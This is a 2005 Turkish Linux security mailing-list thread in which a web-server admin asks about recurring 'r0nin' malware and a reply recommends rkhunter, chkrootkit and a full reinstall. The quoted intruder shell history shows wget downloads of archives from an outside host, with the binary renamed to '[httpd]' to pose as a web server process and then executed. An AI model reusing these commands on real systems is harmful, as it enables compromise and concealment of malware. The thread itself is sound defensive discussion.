From: Cem Ahmet MERCAN (HBM) (mercan@be.itu.edu.tr)
Date: Mon 18 Apr 2005 - 14:46:53 EEST
Merhaba;
rootkit tarayan programlardan biri ile sisteminizi taramanizi öneririm:
http://www.rootkit.nl/ programini rkhunter -c komutu ile
http://www.chkrootkit.org/ programini ./chkrootkit komutu ile
kullanabilirsiniz.
en azindan hacklendiginizden ve ne tur bir hack yada acik oldugundan
haberiniz olur. Ama sisteminizi bu halde birakmayin, sadece cok gerekli
olan cok az dosyayi bir yere kopyalayip sistemi sifirdan tekrar kurun
derim. Hatta bu sistemden gelen konfigurasyon dosyalariniza bile
guvenmeyin, eger gercekten o dosyaya hakim degilseniz.
İyi Günler...
Cem Ahmet MERCAN
The RED wrote:
>
> /var/tmp dizininde .bash_history oluşmuş. Sunucudaki exploit bir shell
> hesabı açıyor herhalde ve ev dizinini /var/tmp olarak veriyor. Normalde
> hiçbir kullanıcının shell izni yok. (sunucu web sunucu)
> /var/tmp/.bash_history dosyasının içeriği:
>
> e
> w
> /sbin/ifconfig
> w
> cd /var/tmp/.hu
> cd /var/tmp
> mkdir .hu
> cd .hu
> wget powerlock.home.ro/newpas.tgz
> wget powerlock.home.ro/newpass.tgz
> tar zxvf newpass.tgz
> mv newpass [httpd]
> export PATH="."
> [httpd]
>
>
> ----- Original Message ----- From: "The RED" <jdred@gmx.net>
> To: <linux-sunucu@liste.linux.org.tr>
> Sent: Monday, April 18, 2005 1:43 PM
> Subject: Re: [Linux-sunucu] r0nin
>
>
>> Birileri sürekli /tmp ve /var/tmp dizinlerine r0nin vs. gibi dosyalar
>> yerleştirip çalıştırıyorlar. Az önce de "atac" isimli bri şey
>> yüklenmiş ve
>> biraz önce bri atak yapıldı. 200-300 tane çalıştırılmış. ddos atağı
>> yapılıyor herhalde sunucu üzerinden. /var/tmp ve /tmp dizinlerindeki
>> dosyaların çalıştırılmasını nasıl önleyebilirim bilen yok mu?? Isletim
>> sistemi: Fedora core 1, kernel 2.4.22-1.2115.nptl,
>
>
>>
>> ----- Original Message ----- From: "The RED" <jdred@gmx.net>
>> To: <linux-sunucu@liste.linux.org.tr>
>> Sent: Monday, April 18, 2005 11:48 AM
>> Subject: [Linux-sunucu] r0nin
>>
>>
>>> merhaba. sunucuma bir süredir r0nin dadandi. daha önce temizlemistim
>>> yeniden
>>> /tmp/ dizini altina girmis. Daha önce de bu dizin altinda r0nin, brk
>>> gibi
>>> şeyler vardi silmistim ama bugün r0nin tekrar o dizinde.
>>> Internetten biraz arastirdim ama yeterli bilgiye rastlayamadim henüz.
>>> Nedir bu r0nin tam olarak? Apache ile ilgili bir açiktan bahsediliyor.
>>> Nasil
>>> bulasiyor? Etkileri (yol açabileceği şeyler) neler ve nasil tam olarak
>>> silinebiliyor? Bilen varsa lütfen yardimci olun.
>>>
>>>
>>
>>
>> --------------------------------------------------------------------------------
>>
>>
>>
>> _______________________________________________
>> Linux-sunucu mailing list
>> Linux-sunucu@liste.linux.org.tr
>> http://liste.linux.org.tr/mailman/listinfo/linux-sunucu
>>
>>
>
>
> --------------------------------------------------------------------------------
>
>
>
> _______________________________________________
> Linux-sunucu mailing list
> Linux-sunucu@liste.linux.org.tr
> http://liste.linux.org.tr/mailman/listinfo/linux-sunucu
>
>------------------------------------------------------------------------
>
>_______________________________________________
>Linux-guvenlik mailing list
>Linux-guvenlik@liste.linux.org.tr
>http://liste.linux.org.tr/mailman/listinfo/linux-guvenlik
>
>
_______________________________________________
Linux-guvenlik mailing list
Linux-guvenlik@liste.linux.org.tr
http://liste.linux.org.tr/mailman/listinfo/linux-guvenlik